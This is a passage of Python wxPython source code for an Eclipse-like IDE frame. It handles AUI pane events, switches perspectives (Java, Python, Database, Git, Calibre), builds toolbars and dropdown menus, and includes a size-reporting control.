self.Bind(aui.EVT_AUINOTEBOOK_ALLOW_DND, self.OnAllowNotebookDnD)
self.Bind(aui.EVT_AUINOTEBOOK_PAGE_CLOSE, self.OnNotebookPageClose)
self.Bind(aui.EVT_AUI_PANE_FLOATING, self.OnFloatDock)
self.Bind(aui.EVT_AUI_PANE_FLOATED, self.OnFloatDock)
self.Bind(aui.EVT_AUI_PANE_DOCKING, self.OnFloatDock)
self.Bind(aui.EVT_AUI_PANE_DOCKED, self.OnFloatDock)
self.Bind(wx.EVT_CLOSE, self.OnClose)
self.Bind(wx.EVT_TIMER, self.TimerHandler)
self.timer = wx.Timer(self)
self.timer.Start(100)
#######################################################################################
def definePoint(self):
'''
right align toolbar
'''
managed_window = self._mgr.GetManagedWindow()
wnd_pos = managed_window.GetPosition()
(x, y) = wnd_size = managed_window.GetSize()
point = wx.Point(x - ((len(self.perspectiveList) - 1) * 32) + 5, 0)
return point
def OnPaneClose(self, event):
logger.debug("OnPaneClose")
# if event.pane.name == "test10":
# msg = "Are you sure you want to "
# if event.GetEventType() == aui.wxEVT_AUI_PANE_MINIMIZE:
# msg += "minimize "
# else:
# msg += "close/hide "
#
# res = wx.MessageBox(msg + "this pane?", "AUI", wx.YES_NO, self)
# if res != wx.YES:
# event.Veto()
def OnAllowNotebookDnD(self, event):
# for the purpose of this test application, explicitly
# allow all noteboko drag and drop events
event.Allow()
def OnNotebookPageClose(self, event):
logger.debug("OnNotebookPageClose")
ctrl = event.GetEventObject()
# if isinstance(ctrl.GetPage(event.GetSelection()), wx.html.HtmlWindow):
#
# res = wx.MessageBox("Are you sure you want to close/hide this notebook page?",
# "AUI", wx.YES_NO, self)
# if res != wx.YES:
# event.Veto()
def OnFloatDock(self, event):
paneLabel = event.pane.caption
etype = event.GetEventType()
strs = "Pane %s " % paneLabel
if etype == aui.wxEVT_AUI_PANE_FLOATING:
strs += "is about to be floated"
if event.pane.name == "test8" and self._veto_tree:
event.Veto()
strs += "... Event vetoed by user selection!"
logger.debug(strs)
return
elif etype == aui.wxEVT_AUI_PANE_FLOATED:
strs += "has been floated"
elif etype == aui.wxEVT_AUI_PANE_DOCKING:
strs += "is about to be docked"
if event.pane.name == "test11" and self._veto_text:
event.Veto()
strs += "... Event vetoed by user selection!"
logger.debug(strs)
return
elif etype == aui.wxEVT_AUI_PANE_DOCKED:
strs += "has been docked"
logger.debug(strs)
def __del__(self):
self.timer.Stop()
def OnClose(self, event):
self.timer.Stop()
self._mgr.UnInit()
event.Skip()
def TimerHandler(self, event):
try:
self.gauge.Pulse()
except:
self.timer.Stop()
#######################################################################################
def setStyleToPanes(self):
all_panes = self._mgr.GetAllPanes()
for pane in all_panes:
if isinstance(pane.window, aui.AuiNotebook):
nb = pane.window
nb.SetAGWWindowStyleFlag(self._notebook_style)
nb.SetArtProvider(aui.ChromeTabArt())
nb.Refresh()
nb.Update()
def constructPerspectiveToolBar(self):
# tb1 = aui.AuiToolBar(self, -1, agwStyle=aui.AUI_TB_DEFAULT_STYLE | wx.NO_BORDER)
tb1 = EclipseAuiToolbar(self)
self.perspectiveList = [
[ID_OTHER_PERSPECTIVE, "Open Perspective", 'new_persp.png', 'Open Perspective', None],
[],
[ID_JAVA_PERSPECTIVE, "Java", 'jperspective.png', 'Java', self.onPerspeciveSelection],
[ID_JAVA_EE_PERSPECTIVE, "Java EE", 'javaee_perspective.png', 'Java EE', self.onPerspeciveSelection],
[ID_DEBUG_PERSPECTIVE, "Debug", 'debug_persp.png', 'Debug', self.onPerspeciveSelection],
[ID_PYTHON_PERSPECTIVE, "Python", 'python_perspective.png', 'Python', self.onPerspeciveSelection],
[ID_DATABASE_PERSPECTIVE, "Database", 'database.png', 'Database', self.onPerspeciveSelection],
[ID_GIT_PERSPECTIVE, "Git", 'gitrepository.png', 'Git', self.onPerspeciveSelection],
[ID_RESOURCE_PERSPECTIVE, "Resources", 'resource_persp.png', 'Resources', self.onPerspeciveSelection],
[ID_CALIBRE_PERSPECTIVE, "Calibre", 'vl_16.png', 'Calibre', self.onPerspeciveSelection],
]
for perspectiveName in self.perspectiveList:
if len(perspectiveName) > 1:
toolBarItem = tb1.AddSimpleTool(perspectiveName[0], perspectiveName[1], self.fileOperations.getImageBitmap(imageName=perspectiveName[2]), short_help_string=perspectiveName[3])
if perspectiveName[4]:
self.Bind(wx.EVT_MENU, perspectiveName[4], id=perspectiveName[0])
if toolBarItem.label == 'Python':
self.selectedPerspectiveName = 'python'
tb1.SetPressedItem(toolBarItem)
else:
tb1.AddSeparator()
return tb1
# def onOpenPerspecitve(self, event):
# logger.debug('onOpenPerspecitve')
def selectItem(self, id=None):
perspectiveToolbar = self._mgr.GetPane("perspectiveToolbar")
item = perspectiveToolbar.window.getToolBarItemById(id)
perspectiveToolbar.window.EnableTool(item, True)
# def hideTools(self,viewToolbar.window, perspectiveName):
# pass
def viewToolBarByPerspective(self, perspectiveName):
viewToolbar = self._mgr.GetPane("viewToolbar")
# viewToolbar.window.DeleteTool(wx.ID_PREFERENCES)
self.constructViewToolBar(viewToolbar.window, perspectiveName)
s = viewToolbar.window.GetMinSize()
viewToolbar.BestSize(s)
allowedInstanceForProspective = [
# SqlConsoleOutputPanel,
py.shell.Shell,
PythonExplorerPanel,
DataSourcePanel,
CreatingJavaExplorerPanel,
FileBrowser,
]
if self.selectedPerspectiveName == 'database':
allowedInstanceForProspective.remove(DataSourcePanel)
elif self.selectedPerspectiveName == 'python':
allowedInstanceForProspective.remove(PythonExplorerPanel)
allowedInstanceForProspective.remove(py.shell.Shell)
elif self.selectedPerspectiveName == 'java':
allowedInstanceForProspective.remove(CreatingJavaExplorerPanel)
elif self.selectedPerspectiveName == 'resource':
allowedInstanceForProspective.remove(FileBrowser)
elif self.selectedPerspectiveName == 'java':
allowedInstanceForProspective.remove(CreatingJavaExplorerPanel)
elif self.selectedPerspectiveName == 'git':
allowedInstanceForProspective.remove(CreatingJavaExplorerPanel)
# for pane in self._mgr.GetAllPanes():
# if pane.window:
# for instance in allowedInstanceForProspective :
# if isinstance(pane.window, instance):
# self._mgr.ClosePane(pane)
# pane.window.Destroy()
# pane.DestroyOnClose(True)
if self.selectedPerspectiveName == 'database':
self.openPanel(name="consoleOutput", imageName="console_view.png", captionName="Console", tabDirection=3)
self.openPanel(name="databaseNaviagor", imageName="folder_database.png", captionName="Database Navigator", tabDirection=4)
elif self.selectedPerspectiveName == 'python':
self.openPanel(name="consoleOutput", imageName="console_view.png", captionName="Console", tabDirection=3)
self.openPanel(name="pythonShellView", imageName="shell.png", captionName="Python Shell", tabDirection=3)
self.openPanel(name="pythonPackageExplorer", imageName="package_explorer.png", captionName="Python Package Explorer", tabDirection=4)
elif self.selectedPerspectiveName == 'resource':
self.openPanel(name="consoleOutput", imageName="console_view.png", captionName="Console", tabDirection=3)
self.openPanel(name="fileExplorer", imageName="file_explorer.png", captionName="File Explorer", tabDirection=4)
elif self.selectedPerspectiveName == 'java':
self.openPanel(name="consoleOutput", imageName="console_view.png", captionName="Console", tabDirection=3)
self.openPanel(name="javaPackageExplorer", imageName="package_explorer.png", captionName="Java Package Explorer", tabDirection=4)
elif self.selectedPerspectiveName == 'calibre':
self.openPanel(name="bookBrowser", imageName="library-16.png", captionName="Book Browser", tabDirection=5)
self.openPanel(name="bookExplorer", imageName="package_explorer.png", captionName="Book Explorer", tabDirection=4)
# else:
# databaseNaviagorPane = self._mgr.GetPane("databaseNaviagor")
# databaseNaviagorPane.Show(False)
for pane in self._mgr.GetAllPanes():
if pane.window:
for instance in allowedInstanceForProspective :
if isinstance(pane.window, instance):
self._mgr.ClosePane(pane)
for pane in self._mgr.GetAllPanes():
if pane.window:
logger.debug(f'pane.window:{pane.window}, pane.window.IsShown():{pane.window.IsShown()}')
self.appendSubMenu(menuBar=self.GetMenuBar(), selectedPerspectiveName=self.selectedPerspectiveName)
self._mgr.Update()
print('viewToolBarByPerspective')
# def openPanel(self, name="consoleOutput", imageName="console_view.png", captionName="Console", tabDirection=3):
# # name="consoleOutput"
# pane = self._mgr.GetPane(name)
# panel = wx.Panel(self)
# if pane.window == None:
# if name == "consoleOutput":
# panel = SqlConsoleOutputPanel(self)
# elif name == "databaseNaviagor":
# panel = DataSourcePanel(self)
# elif name == "pythonPackageExplorer":
# panel = CreatingPythonExplorerPanel(self)
# elif name == "projectExplorerView":
# panel = CreatingProjectExplorerPanel(self)
# elif name == "javaPackageExplorer":
# panel = CreatingJavaExplorerPanel(self)
# elif name == "pythonShellView":
# intro = f'{py.version.VERSION}'
# panel = py.shell.Shell(self, -1, introText=intro)
# elif name == "terminalView":
# panel = CreatingPythonExplorerPanel(self)
# elif name == "navigatorView":
# panel = CreatingPythonExplorerPanel(self)
# elif name == "tasksView":
# panel = CreatingPythonExplorerPanel(self)
# elif name == "fileExplorer":
# panel = FileBrowser(self, size=(500, 300))
# elif name == "bookExplorer":
# panel = BookExplorerPanel(self, size=(500, 300))
#
# self._mgr.addTabByWindow(panel, imageName=imageName, name=name , captionName=captionName, tabDirection=tabDirection)
# elif not pane.IsShown():
# pane.dock_direction = tabDirection
# window = pane.window
# if window:
# window.Show()
# pane.Show(True)
# # item.state=4
def onPerspeciveSelection(self, event):
logger.debug('onPerspeciveSelection')
# pub.sendMessage('perspectiveClicked', data=42, extra1='onJavaPerspective')
self.selectItem(event.Id)
if event.Id == ID_CALIBRE_PERSPECTIVE:
self.selectedPerspectiveName = 'calibre'
self.viewToolBarByPerspective(self.selectedPerspectiveName)
if event.Id == ID_JAVA_PERSPECTIVE:
self.selectedPerspectiveName = 'java'
self.viewToolBarByPerspective(self.selectedPerspectiveName)
elif event.Id == ID_JAVA_EE_PERSPECTIVE:
self.selectedPerspectiveName = 'java ee'
self.viewToolBarByPerspective(self.selectedPerspectiveName)
elif event.Id == ID_DEBUG_PERSPECTIVE:
self.selectedPerspectiveName = 'debug'
self.viewToolBarByPerspective(self.selectedPerspectiveName)
elif event.Id == ID_PYTHON_PERSPECTIVE:
self.selectedPerspectiveName = 'python'
self.viewToolBarByPerspective(self.selectedPerspectiveName)
elif event.Id == ID_DATABASE_PERSPECTIVE:
self.selectedPerspectiveName = 'database'
self.viewToolBarByPerspective(self.selectedPerspectiveName)
elif event.Id == ID_GIT_PERSPECTIVE:
self.selectedPerspectiveName = 'git'
self.viewToolBarByPerspective(self.selectedPerspectiveName)
elif event.Id == ID_RESOURCE_PERSPECTIVE:
self.selectedPerspectiveName = 'resource'
self.viewToolBarByPerspective(self.selectedPerspectiveName)
def constructViewToolBar(self, toobar=None, perspectiveName='python'):
# create some toolbars
# tb1 = aui.AuiToolBar(self, -1, agwStyle=aui.AUI_TB_DEFAULT_STYLE | wx.NO_BORDER)
if toobar == None:
self._ctrl = None
toobar = EclipseAuiToolbar(self)
# id, leble, imageName, lebel, method,setToolDropdown , list of perspective, initial state(disable/enable ), kind=wx.ITEM_CHECK
tools = [
(ID_NEW, "New", "new_con.png", 'New', self.onNewMenu, True, ['resource', 'python', 'java', 'debug', 'java ee'], True, wx.ITEM_NORMAL),
(),
(ID_SAVE, "Save (Ctrl+S)", "save.png", 'Save (Ctrl+S)', self.onSave, False, ['resource', 'python', 'java', 'debug', 'java ee', 'database'], False, wx.ITEM_NORMAL),
(ID_SAVE_ALL, "Save All (Ctrl+Shift+S)", "saveall_edit.png", 'Save All (Ctrl+Shift+S)', self.onSaveAll, False, ['resource', 'python', 'java', 'debug', 'java ee', 'database'], False, wx.ITEM_NORMAL),
(ID_BUILD_ALL, "Build All (Ctrl+B)", "build_exec.png", "Build All (Ctrl+B)", None, False, [ 'python', 'java', 'java ee'], True, wx.ITEM_NORMAL),
(ID_TERMINAL, "Open a Terminal", "linux_terminal.png", "Open a Terminal (Ctrl+Shift+Alt+T)", self.onOpenTerminal, False, ['resource', 'python', 'java', 'debug', 'java ee'], True, wx.ITEM_NORMAL),
(),
(ID_SKIP_ALL_BREAKPOINTS, "Skip All Breakpoints (Ctrl+Alt+B)", "skip_brkp.png", "Skip All Breakpoints (Ctrl+Alt+B)", self.onSkipAllBreakPoints, False, ['resource', 'python', 'java', 'debug', 'java ee'], True, wx.ITEM_CHECK),
(ID_NEW_JAVA_PACKAGE, "New Java Package", "newpack_wiz.png", "New Java Package", self.onOpenTerminal, False, ['resource', 'java'], True, wx.ITEM_NORMAL),
(ID_NEW_JAVA_CLASS, "New Java Class", "newclass_wiz.png", "New Java Class", self.onOpenTerminal, True, ['resource', 'java'], True, wx.ITEM_NORMAL),
(ID_RESUME_DEBUG, "Resume", "resume_co.png", "Resume", self.onOpenTerminal, False, ['debug', 'java ee'], False, wx.ITEM_NORMAL),
(ID_SUSPEND_DEBUG, "Suspend", "suspend_co.png", "Suspend", self.onOpenTerminal, False, ['debug', 'java ee'], False, wx.ITEM_NORMAL),
(ID_TERMNATE_DEBUG, "Terminate", "terminatedlaunch_obj.png", "Terminate", self.onOpenTerminal, False, ['debug', 'java ee'], False, wx.ITEM_NORMAL),
(ID_DISCONNECT_DEBUG, "Disconnect", "disconnect_co.png", "Disconnect", self.onOpenTerminal, False, ['debug', 'java ee'], False, wx.ITEM_NORMAL),
(ID_STEP_INTO_DEBUG, "Step Into", "stepinto_co.png", "Step Into", self.onOpenTerminal, False, ['debug', 'java ee'], False, wx.ITEM_NORMAL),
(ID_STEP_OVER_DEBUG, "Step Over", "stepover_co.png", "Step Over", self.onOpenTerminal, False, ['debug', 'java ee'], False, wx.ITEM_NORMAL),
(ID_STEP_RETURN_DEBUG, "Step Return", "stepreturn_co.png", "Step Return", self.onOpenTerminal, False, ['debug', 'java ee'], False, wx.ITEM_NORMAL),
(),
(ID_DEBUG_AS_MENU, "Debug As...", "debug_exc.png", "Debug As...", self.onOpenTerminal, True, ['python', 'java', 'debug', 'java ee'], True, wx.ITEM_NORMAL),
(ID_RUN_AS_MENU, "Run As...", "run_exc.png", "Run As...", self.onRunAsMenu, True, ['python', 'java', 'debug', 'java ee'], True, wx.ITEM_NORMAL),
(ID_CREATE_DYNAMIC_WEB_PROJECT, "Create a Dynamic Web Project", "create_dynamic_web_project.png", "Create a Dynamic Web Project", self.onRunAsMenu, True, ['java ee'], True, wx.ITEM_NORMAL),
(ID_CREATE_NEW_SERVLET, "Create a New Servlet", "create_new_servlet.png", "Create a New Servlet", self.onRunAsMenu, True, ['java ee'], True, wx.ITEM_NORMAL),
(ID_OPEN_TYPE, "Open Type", "opentype.png", "Open Type", self.onOpenTerminal, False, ['resource', 'python', 'java', 'debug'], True, wx.ITEM_NORMAL),
(ID_OPEN_TASK, "Open Task (Ctrl+F12)", "open_task.png", "Open Task (Ctrl+F12)", self.onOpenTask, False, ['resource', 'python', 'java', 'debug'], True, wx.ITEM_NORMAL),
(ID_SEARCH, "Search", "searchres.png", "Search", self.onOpenSearch, True, ['resource', 'python', 'java', 'debug'], True, wx.ITEM_NORMAL),
(ID_LAST_EDIT, "Last Edit Location", "last_edit_pos.png", "Last Edit Location", self.onOpenTerminal, False, ['resource', 'python', 'java', 'debug'], True, wx.ITEM_NORMAL),
(ID_BACKWARD, "Back", "backward_nav.png", "Back", self.onOpenTerminal, True, ['python', 'java', 'debug'], True, wx.ITEM_NORMAL),
(ID_FORWARD, "Forward", "forward_nav.png", "Forward", self.onOpenTerminal, True, ['python', 'java', 'debug'], False, wx.ITEM_NORMAL),
(ID_newConnection, "New Connection", "connect.png", "New Connection", None, False, ['database'], True, wx.ITEM_NORMAL),
(ID_openConnection, "Open Connection", "database_connect.png", 'Open Connection', None, False, ['database'], True, wx.ITEM_NORMAL),
(ID_newWorksheet, "Script", "script.png", 'Open a new script worksheet', None, False, ['database'], True, wx.ITEM_NORMAL),
(ID_ADD_BOOK, "Add Book", "add_book_16.png", 'Add Book', lambda e: self.onCalibre(e), True, ['calibre'], True, wx.ITEM_NORMAL),
(ID_EDIT_BOOK_METADATA, "Edit Book metadata", "edit_book_16.png", 'Edit Book metadata', lambda e: self.onCalibre(e), True, ['calibre'], True, wx.ITEM_NORMAL),
(ID_CONVERT_BOOK, "Convert Book", "txn_config.png", 'Convert Book', lambda e: self.onCalibre(e), False, ['calibre'], True, wx.ITEM_NORMAL),
(ID_REMOVE_BOOK, "Remove Book", "remove_books_16.png", 'Remove Book', lambda e: self.onCalibre(e), False, ['calibre'], True,wx.ITEM_NORMAL),
(ID_GET_BOOK, "Get Book", "store_16.png", 'Get Book', lambda e: self.onCalibre(e), False, ['calibre'], True, wx.ITEM_NORMAL),
(ID_CONNECT_SHARE_BOOK, "Connect Share", "connect_share_on_16.png", 'Connect Share', lambda e: self.onCalibre(e), False, ['calibre'], True, wx.ITEM_NORMAL),
(ID_RELOAD_BOOK, "Reload Books", "resultset_refresh.png", 'Reload Books', lambda e: self.onCalibre(e), False, ['calibre'], True, wx.ITEM_NORMAL),
# (wx.ID_PREFERENCES, "Preferences", "preference.png", 'Preference', None),
]
if len(self.toolbarItems) == 0:
for tool in tools:
if len(tool) == 0:
toobar.AddSeparator()
# elif perspectiveName in tool[6]:
else:
logger.debug(tool)
state = tool[7]
if tool[8] == wx.ITEM_RADIO:
toolItem = toobar.AddToggleTool(tool[0], self.fileOperations.getImageBitmap(imageName=tool[2]), wx.NullBitmap, toggle=True, short_help_string=tool[3])
if tool[8] == wx.ITEM_CHECK:
toolItem = toobar.AddToggleTool(tool[0], self.fileOperations.getImageBitmap(imageName=tool[2]), wx.NullBitmap, toggle=True, short_help_string=tool[3])
toolItem.__setattr__('toggle', False)
toolItem.SetState(AUI_BUTTON_STATE_NORMAL)
toolItem.SetKind(wx.ITEM_CHECK)
elif tool[8] == wx.ITEM_NORMAL:
toolItem = toobar.AddSimpleTool(tool[0], tool[1], self.fileOperations.getImageBitmap(imageName=tool[2]), short_help_string=tool[3], kind=tool[8])
if state:
toolItem.state &= ~aui.AUI_BUTTON_STATE_DISABLED
else:
toolItem.state |= aui.AUI_BUTTON_STATE_DISABLED
if tool[4]:
self.Bind(wx.EVT_MENU, tool[4], tool[0])
if tool[5]:
toobar.SetToolDropDown(tool[0], tool[5])
self.Bind(aui.EVT_AUITOOLBAR_TOOL_DROPDOWN, self.onRunDebugAsDropDown, id=tool[0])
##############################################################
for tool in toobar._items:
self.toolbarItems[tool.GetId()] = tool
toobar._items.clear()
if self._ctrl:
self._ctrl.Hide()
for tool in tools:
if len(tool) != 0 and perspectiveName in tool[6]:
try:
if perspectiveName=='calibre':
toobar._items.append(self.toolbarItems[tool[0]])
else:
toobar._items.append(self.toolbarItems[tool[0]])
except Exception as e:
logger.error(e)
logger.error(tool[0], tool)
toobar.Realize()
# self.Bind(aui.EVT_AUITOOLBAR_TOOL_DROPDOWN, self.onRunDebugAsDropDown, id=ID_NEW)
# self.Bind(aui.EVT_AUITOOLBAR_TOOL_DROPDOWN, self.onRunDebugAsDropDown, id=ID_RUN_AS_MENU)
# self.Bind(aui.EVT_AUITOOLBAR_TOOL_DROPDOWN, self.onRunDebugAsDropDown, id=ID_DEBUG_AS_MENU)
# self.Bind(aui.EVT_AUITOOLBAR_TOOL_DROPDOWN, self.onRunDebugAsDropDown, id=ID_NEW_JAVA_CLASS)
# self.Bind(aui.EVT_AUITOOLBAR_TOOL_DROPDOWN, self.onRunDebugAsDropDown, id=ID_CREATE_DYNAMIC_WEB_PROJECT)
# self.Bind(aui.EVT_AUITOOLBAR_TOOL_DROPDOWN, self.onRunDebugAsDropDown, id=ID_CREATE_NEW_SERVLET)
return toobar
def onCalibre(self, event):
# logger.debug(f'onCalibre {event.Id}')
viewToolbar = self._mgr.GetPane("viewToolbar").window
if event.Id == ID_RELOAD_BOOK:
logger.debug(f'ID_RELOAD_BOOK')
item=viewToolbar.FindTool(ID_RELOAD_BOOK)
item.SetState(aui.AUI_BUTTON_STATE_NORMAL)
pub.sendMessage('reloadingDatabase', event=event)
if event.Id == ID_ADD_BOOK:
logger.debug(f'ID_ADD_BOOK')
item=viewToolbar.FindTool(ID_ADD_BOOK)
item.SetState(aui.AUI_BUTTON_STATE_NORMAL)
if event.Id == ID_EDIT_BOOK_METADATA:
logger.debug(f'ID_EDIT_BOOK_METADATA')
item=viewToolbar.FindTool(ID_EDIT_BOOK_METADATA)
item.SetState(aui.AUI_BUTTON_STATE_NORMAL)
if event.Id == ID_CONVERT_BOOK:
logger.debug(f'ID_CONVERT_BOOK')
item=viewToolbar.FindTool(ID_CONVERT_BOOK)
item.SetState(aui.AUI_BUTTON_STATE_NORMAL)
if event.Id == ID_REMOVE_BOOK:
logger.debug('ID_REMOVE_BOOK')
item=viewToolbar.FindTool(ID_REMOVE_BOOK)
item.SetState(aui.AUI_BUTTON_STATE_NORMAL)
# toolRemove.state =aui.AUI_BUTTON_STATE_NORMAL
# pub.sendMessage('ID_REMOVE_BOOK', event=ID_REMOVE_BOOK)
if event.Id == ID_GET_BOOK:
logger.debug(f'ID_GET_BOOK')
item=viewToolbar.FindTool(ID_GET_BOOK)
item.SetState(aui.AUI_BUTTON_STATE_NORMAL)
if event.Id == ID_CONNECT_SHARE_BOOK:
logger.debug(f'ID_CONNECT_SHARE_BOOK')
viewToolbar.Realize()
self._mgr.Update()
def onOpenTerminal(self, event):
logger.debug(f'onOpenTerminal {event.Id}')
def onSkipAllBreakPoints(self, event):
logger.debug(f'onSkipAllBreakPoints {event.Id}')
event.GetEventObject()._tip_item
# event.GetEventObject()._tip_item.__setattr__(toggle,False)
if event.GetEventObject()._tip_item.toggle:
# event.GetEventObject()._tip_item.SetBitmap(event.GetEventObject()._tip_item.GetBitmap())
event.GetEventObject()._tip_item.SetState(AUI_BUTTON_STATE_NORMAL)
else:
event.GetEventObject()._tip_item.SetState(AUI_BUTTON_STATE_PRESSED)
event.GetEventObject()._tip_item.toggle = not event.GetEventObject()._tip_item.toggle
event.GetEventObject().GetToolToggled(event.GetEventObject()._tip_item.GetId())
# event.GetEventObject().GetToolToggled(event.GetEventObject()._tip_item.GetId())
event.GetEventObject().Refresh(True)
event.GetEventObject().Update()
# if event.GetEventObject()._tip_item.GetState() != AUI_BUTTON_STATE_NORMAL:
# event.GetEventObject()._tip_item.SetState(AUI_BUTTON_STATE_NORMAL)
# else:
# event.GetEventObject()._tip_item.SetState(AUI_BUTTON_STATE_PRESSED)
def onOpenTask(self, event):
logger.debug('onOpenTask')
def onOpenSearch(self, event):
logger.debug('onOpenSearch')
def onRunAsMenu(self, event):
logger.debug('onRunAsMenu')
def onNewMenu(self, event):
logger.debug('onNewMenu')
newFileframe = NewFlowFrame(self, 'New', selectedPath="c:\work\python-project")
newFileframe.CenterOnScreen()
newFileframe.Show()
# def onSave(self, event):
# logger.debug('onSave1')
# viewToolbar = self._mgr.GetPane("viewToolbar")
# toolSave=viewToolbar.window.FindTool(ID_SAVE)
# toolSave.state =aui.AUI_BUTTON_STATE_DISABLED
# self._mgr.Update()
# def onSaveAll(self, event):
# logger.debug('onSaveAll1')
# viewToolbar = self._mgr.GetPane("viewToolbar")
# toolSaveAll=viewToolbar.window.FindTool(ID_SAVE_ALL)
# toolSaveAll.state =aui.AUI_BUTTON_STATE_DISABLED
# toolSave=viewToolbar.window.FindTool(ID_SAVE)
# toolSave.state =aui.AUI_BUTTON_STATE_DISABLED
# self._mgr.Update()
def onRunDebugAsDropDown(self, event):
if event.IsDropDownClicked():
tb = event.GetEventObject()
tb.SetToolSticky(event.GetId(), True)
baseList = list()
if event.Id == ID_RUN_AS_MENU:
baseList = [
[],
[ID_RUN_AS, 'Run As', None, None],
[ID_RUN_CONFIG, 'Run Configurations...', None, None],
[ID_ORGANIZE_FAVORITES, 'Organize Favorites..', None, None],
]
elif event.Id == ID_DEBUG_AS_MENU:
baseList = [
[],
[ID_DEBUG_AS, 'Debug As', None, None],
[ID_DEBUG_CONFIG, 'Run Configurations...', None, None],
[ID_ORGANIZE_FAVORITES, 'Organize Favorites..', None, None],
]
elif event.Id == ID_ADD_BOOK:
baseList = [
[],
[wx.NewIdRef(), 'Add book from directory', "new_testcase.png", None],
]
elif event.Id == ID_NEW_JAVA_CLASS:
baseList = [
[],
[ID_JUNIT_TEST_CASE, 'Junit Test Case', "new_testcase.png", None],
[ID_CLASS, 'Class', 'newclass_wiz.png', None],
[ID_INTERFACE, 'Interface', 'newint_wiz.png', None],
[ID_ENUM, 'Enum', 'newenum_wiz.png', None],
[ID_ANNOTATION, 'Annotation', 'newannotation_wiz.png', None],
[ID_JAX_WS_HANDLER, 'JAX-WS Handler', 'jax_ws.png', None],
]
elif event.Id == ID_CREATE_DYNAMIC_WEB_PROJECT:
baseList = [
[],
[ID_DYNAMIC_WEB_PROJECT, 'Dynamic Web Project', 'create_dynamic_web_project.png', None],
[ID_WEB_FRAGMENT_PROJECT, 'Web Fragment Project', 'web_fragment_prj.png', None],
[ID_EJB_PROJECT, 'EJB Project', 'ejb_project.png', None],
[ID_ENTERPRISE_APP_PROJECT, 'Enterprise Application Project', 'enterprise_app.png', None],
[ID_APP_CLIENT_PROJECT, 'Application Client Project', 'app_client_prj.png', None],
[ID_CONNECTER_PROJECT, 'Connecter Project', 'connecter_prj.png', None],
[ID_UTILITY_PROJECT, 'Utility Project', 'java_lib_obj.png', None],
]
elif event.Id == ID_CREATE_NEW_SERVLET:
baseList = [
[],
[ID_SERVLET, 'Servlet', 'create_new_servlet.png', None],
[ID_FILTER, 'Filter', 'filter.png', None],
[ID_LISTENER, 'Listener', 'listener.png', None],
[ID_SESSION_BEAN, 'Session Bean', 'session_bean.png', None],
[ID_MESSAGE_DRIVEN_BEAN, 'Message-Driven Bean', 'message_driven_bean.png', None],
[ID_EJB_TIMER, 'EJB Timer', 'session_bean.png', None],
[ID_JPA_ENTITY, 'JPA entity', 'eclipseLink_dynamic_entity.png', None],
[ID_JPA_ORM_MAPPING_FILE, 'JPA ORM Mapping File', 'jpa_orm_mapping.png', None],
[ID_ECLIPSE_LINK_ORM_MAPPING_FILE, 'Eclipse Link ORM Mapping File', 'jpa_orm_mapping.png', None],
[ID_XDOCKLET_ENTERPRISE_JAVA_BEAN, 'XDocklet Enterprise Java Bean', 'xdoclet_ejb.png', None],
[ID_ECLIPSELINK_DYNAMIC_ENTITY, 'EclipseLink Dynamic Entity', 'eclipseLink_dynamic_entity.png', None],
]
elif event.Id == ID_NEW:
baseList = menuItemList[self.selectedPerspectiveName]
menuItemListx = {
self.selectedPerspectiveName: baseList
}
# create the popup menu
# menuPopup = wx.Menu()
menuPopup = self.createMenuByPerspective(menuItemList=menuItemListx, perspectiveName=self.selectedPerspectiveName)
# line up our menu with the button
rect = tb.GetToolRect(event.GetId())
pt = tb.ClientToScreen(rect.GetBottomLeft())
pt = self.ScreenToClient(pt)
self.PopupMenu(menuPopup, pt)
# make sure the button is "un-stuck"
tb.SetToolSticky(event.GetId(), False)
def createMenuByPerspective(self, menuItemList=None, perspectiveName='python'):
menuPopup = wx.Menu()
for menuItemName in menuItemList[perspectiveName]:
if len(menuItemName) > 1:
menuItem = wx.MenuItem(menuPopup, menuItemName[0], menuItemName[1])
if menuItemName[2]:
menuItem.SetBitmap(self.fileOperations.getImageBitmap(imageName=menuItemName[2]))
menuPopup.Append(menuItem)
self.Bind(wx.EVT_MENU, lambda e:self.onRightClickMenu(e), id=menuItemName[0])
else:
menuPopup.AppendSeparator()
return menuPopup
def creatingFileExplorer(self):
fileBrowserPanel = FileBrowser(self, size=(200, 300))
return fileBrowserPanel
def creatingTreeCtrl(self):
# Create a TreeCtrl
# treePanel = CreatingTreePanel(self)
treePanel = DataSourcePanel(self)
return treePanel
def getWorksheet(self, dataSourceTreeNode=None):
worksheetPanel = CreatingWorksheetWithToolbarPanel(self, -1, style=wx.CLIP_CHILDREN | wx.BORDER_NONE, dataSourceTreeNode=dataSourceTreeNode)
return worksheetPanel
def constructCenterPane(self):
worksheet = CreateWorksheetTabPanel(self)
# worksheet.addTab('Start Page')
return worksheet
def sqlConsoleOutputPane(self):
sqlConsoleOutputPanel = SqlConsoleOutputPanel(self)
return sqlConsoleOutputPanel
def constructHistoryPane(self):
historyGrid = HistoryGrid(self)
return historyGrid
def CreateSizeReportCtrl(self, width=80, height=80):
ctrl = SizeReportCtrl(self, -1, wx.DefaultPosition,
wx.Size(width, height), self._mgr)
return ctrl
class SizeReportCtrl(wx.PyControl):
def __init__(self, parent, id=wx.ID_ANY, pos=wx.DefaultPosition,
size=wx.DefaultSize, mgr=None):
wx.PyControl.__init__(self, parent, id, pos, size, wx.NO_BORDER)
self._mgr = mgr
# self.Bind(wx.EVT_PAINT, self.OnPaint)
self.Bind(wx.EVT_SIZE, self.OnSize)
self.Bind(wx.EVT_ERASE_BACKGROUND, self.OnEraseBackground)
def OnPaint(self, event):
dc = wx.PaintDC(self)
size = self.GetClientSize()
s = ("Size: %d x %d") % (size.x, size.y)
dc.SetFont(wx.NORMAL_FONT)
w, height = dc.GetTextExtent(s)
height = height + 3
dc.SetBrush(wx.WHITE_BRUSH)
dc.SetPen(wx.WHITE_PEN)
dc.DrawRectangle(0, 0, size.x, size.y)
dc.SetPen(wx.LIGHT_GREY_PEN)
dc.DrawLine(0, 0, size.x, size.y)
dc.DrawLine(0, size.y, size.x, 0)
dc.DrawText(s, (size.x - w) / 2, ((size.y - (height * 5)) / 2))
if self._mgr:
pi = self._mgr.GetPane(self)
s = ("Layer: %d") % pi.dock_layer
w, h = dc.GetTextExtent(s)
dc.DrawText(s, (size.x - w) / 2, ((size.y - (height * 5)) / 2) + (height * 1))
s = ("Dock: %d Row: %d") % (pi.dock_direction, pi.dock_row)
w, h = dc.GetTextExtent(s)
dc.DrawText(s, (size.x - w) / 2, ((size.y - (height * 5)) / 2) + (height * 2))
s = ("Position: %d") % pi.dock_pos
w, h = dc.GetTextExtent(s)
